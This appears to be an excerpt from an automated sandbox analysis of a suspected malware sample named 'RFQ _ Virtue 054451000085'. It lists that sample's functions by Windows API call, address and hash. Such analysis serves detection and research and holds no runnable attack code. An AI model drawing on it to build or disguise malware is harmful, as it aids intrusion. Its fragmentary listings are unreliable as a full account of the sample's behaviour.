                                                                                • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                                • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 00402231
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                                • GetStockObject.GDI32(00000005), ref: 00402258
                                                                                • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 1946975507-0
                                                                                • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                                • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                                • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %I
                                                                                • API String ID: 0-63094095
                                                                                • Opcode ID: 7529cc8c48647e6d4a72391ec485b67292564c6fe3cbb07e68201f0b86d76f72
                                                                                • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                                • Opcode Fuzzy Hash: 7529cc8c48647e6d4a72391ec485b67292564c6fe3cbb07e68201f0b86d76f72
                                                                                • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __itow_s
                                                                                • String ID: xbL$xbL
                                                                                • API String ID: 3653519197-3351732020
                                                                                • Opcode ID: e709fd47f5c2feaab7cb22cc2c50c9004a19bc4dd19b06f16d126bf100fb6cf2
                                                                                • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                                • Opcode Fuzzy Hash: e709fd47f5c2feaab7cb22cc2c50c9004a19bc4dd19b06f16d126bf100fb6cf2
                                                                                • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                                APIs
                                                                                  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                • String ID: LPT
                                                                                • API String ID: 3222508074-1350329615
                                                                                • Opcode ID: 22386211fa87ba6f25b54d14b3f4bab1e3a1f04917f9a9de026b4ee2e74de440
                                                                                • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                                • Opcode Fuzzy Hash: 22386211fa87ba6f25b54d14b3f4bab1e3a1f04917f9a9de026b4ee2e74de440
                                                                                • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 00412968
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                                • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                                APIs
                                                                                  • Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29
                                                                                • _wcscmp.LIBCMT ref: 00469824
                                                                                • _wcscmp.LIBCMT ref: 00469837
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                • String ID: FILE
                                                                                • API String ID: 4029003684-3121273764
                                                                                • Opcode ID: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                                                                • Instruction ID: cde52b3ca8712c625de002da450250744642bb9d8a04c3b997614ed6dba67ccd
                                                                                • Opcode Fuzzy Hash: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                                                                • Instruction Fuzzy Hash: 8C41A771A0021ABADF20AAA5CC45FEF77BDDF85714F00047EB604B7181DA79AD058B69
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID: DdL$DdL
                                                                                • API String ID: 1473721057-91670653
                                                                                • Opcode ID: c0a4b12d34a2949c4f0399b8a32a882820cb71d7b6b526698ba9514fc12a179e
                                                                                • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                                                • Opcode Fuzzy Hash: c0a4b12d34a2949c4f0399b8a32a882820cb71d7b6b526698ba9514fc12a179e
                                                                                • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0047259E
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_memset
                                                                                • String ID: |
                                                                                • API String ID: 1413715105-2343686810
                                                                                • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                                • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                                • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                                • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                                • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00462911
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 02f8dc35456dfc2bbe9dcb27fd05540f8121118cc68a5e2dcd1f62f28904bbf4
                                                                                • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                                                • Opcode Fuzzy Hash: 02f8dc35456dfc2bbe9dcb27fd05540f8121118cc68a5e2dcd1f62f28904bbf4
                                                                                • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                                • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                                APIs
                                                                                  • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                  • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                  • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                                • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                                                • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00462A22
                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                                • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
